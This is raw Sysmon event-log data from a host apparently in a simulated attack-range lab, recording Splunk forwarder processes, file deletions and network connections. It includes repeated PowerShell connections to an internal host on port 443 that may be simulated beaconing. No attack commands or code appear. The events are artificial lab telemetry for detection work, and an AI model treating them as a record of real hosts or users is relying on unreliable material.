154100x800000000000000035128022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.897{B81B27B7-8319-613A-C696-03000000C801}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.513{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E05E5737E6E5221CE4448F2E48519F7F,SHA256=1AA1086180527E7F1E73C37DD227C3633CAED7A43DB308D10C366C82F87FDC53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.513{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C19820AC4209C11FA8D053926EE9A8A4,SHA256=E1B2733DD488735EBD4F6184E897F91D6DCAC621BCAEE1821E429E143475321A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.377{B81B27B7-8319-613A-C596-03000000C801}29566672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1351C729F860A1F5D39E91D0236839EE,SHA256=12C1C9F18B8F0F7C6D39B81A19CA8C6AAB4BF7B40B4808A7A1C990CFF2F74B65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.213{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8319-613A-C596-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.213{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.213{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.213{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.213{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.213{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8319-613A-C596-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.213{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8319-613A-C596-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:41.198{B81B27B7-8319-613A-C596-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035128009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:05.496{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62098-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:42.927{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E05E5737E6E5221CE4448F2E48519F7F,SHA256=1AA1086180527E7F1E73C37DD227C3633CAED7A43DB308D10C366C82F87FDC53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:42.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CAAAF4CA6FBC25E72EF3C297697A2E5,SHA256=CA75DB0CAAC7C6DFC2A20AAF4B0B89C090905E3C56D4A04605AEBD2E060358AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:43.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931640966318D8DED1ECA4F45C31FE55,SHA256=EE560C33C1B6BF852E0573092470249A0080A27C3907530D1772DDAF1E763069,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:44.311{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47353FFFE8F415AFBCD058E4EF54A10E,SHA256=845327EA42FE9D2AE18D87957F2F4AE798947FCD23712CADB26AB5B5996D9A54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:45.341{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4673C264C7B56F7541160646E6A2FB1A,SHA256=8FB8719673359EC6D9C4629E7C62EF314A409129CD1B7584B239005B12694CF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:09.254{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62099-false10.0.1.12-8000- 23542300x800000000000000035128037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:46.375{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2E13378ED6EDBAE55373115402C98B37,SHA256=4855718B908B409DFA591268ADE4BEF4DC6402672F2813A7C1BE881C069FAF01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:46.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51B53EE738F50F0D014D07AB41E5907F,SHA256=0E78DF06412ED1344824FF0A083B7033283B78F9980CAD64CB70CDEFA2F2A646,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:11.507{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62100-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:47.408{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B426C1220B259B6E74D7C91FA3AD654,SHA256=0F3DBD50C3BF8A8D341ECE71AE90B6D1599303DCB7DA656B0016FFCE60253B23,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:48.422{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC768FC864401B58A2D6FBF061B922AD,SHA256=F3FEDE6798907F61F6E5F6BE26C42EC315013D9977BBA2750CDE42984AF00C84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:14.372{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62101-false10.0.1.12-8000- 23542300x800000000000000035128041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:49.437{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C7E7051768F637DD5248F07BD730DAE,SHA256=D3CA78CEA0C74DE8F28E019C91EB1297DF06297CE8024EB67AD48DFF895E3872,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:50.451{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=507B356151A46CC715E86C9DE078D867,SHA256=5624A47532C307B8C05F238F22C94B19E7B176834C40FC1FCE8705FE6BBA0626,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:51.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8810EBCFB9B2D52CAC677CEA7D4B0BC4,SHA256=A08614E564054F7677986E86739D4DB903C1F7E40B0F0CB2B4A3883A4FE98FAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:17.516{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62102-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:52.486{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=524773B34B9D1ADFA748540FC0997118,SHA256=B574EA97F1A84F9E8734918CE9A9623D50DD8710A53F4227DF5AA15763505A14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:52.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F831202D86515E570F347DCC3E1E723F,SHA256=1E1F8E39AAF16659E1D2C92FB8F2C112D257DFBB48DF86F64024558140F3864C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:53.501{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25CDC4AC1B3578E41AD94F345478ABA6,SHA256=E630A18B83E4E79BD3EF423ED1E83B0C7421AE6D2AD9B58D1CCC77261C026FD2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:54.516{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8513F0B8BB6BFF1B5C30B78314D535DB,SHA256=9B488FF8B738019D02AE5DB78E889098CA908661CEC895E2E900A3693078F9DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:20.265{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62103-false10.0.1.12-8000- 23542300x800000000000000035128050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:55.531{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6A59E504DA8AE9F33E03EF39E166E6D,SHA256=AF7B5B39003B5696174238E57F46DDC481220BDBFB7FF240794963A074DC5990,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:56.546{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=441103B26CD98A069414628E0B9B07F8,SHA256=D6267B48115C196464D08E392139596A313805EF0635EAEC0582ADD551670709,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:57.568{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48442284CE19291CFFE2617AA2774DE8,SHA256=0980E08291C01843D47055D15D1D6357968F443764070D40FC92761E297E4C05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:23.527{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62104-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:58.584{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8FCA64F434528BFCA3B2A1C27784575,SHA256=57D0D559430F7EE35077081CA89EAB661C0ED39AC85D050504BE83C92EB6B1DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:58.346{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=97E8BE4938C3EFDC55151F2D56605AC0,SHA256=72625FAD7DEEFA1458F05561A40F6CBFAD8E891D36DD61625FD8657522599C1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:56:59.598{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21ACD4BB71C866BD7D2201575521C57A,SHA256=F5C0AF6CEC85A532BA44332ACBEFC0BB5FB4BA65039DF5B259DA60E6C8F81995,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:00.664{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=791E7779F70DBA599D4BB33E91E459A3,SHA256=2F107F5D9BEDF19148AA06EBE1754B64AB4E8179D5CE31BBF0CF2CF1CD52A090,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:00.029{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:26.194{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62106-false10.0.1.12-8089- 354300x800000000000000035128061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:25.379{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 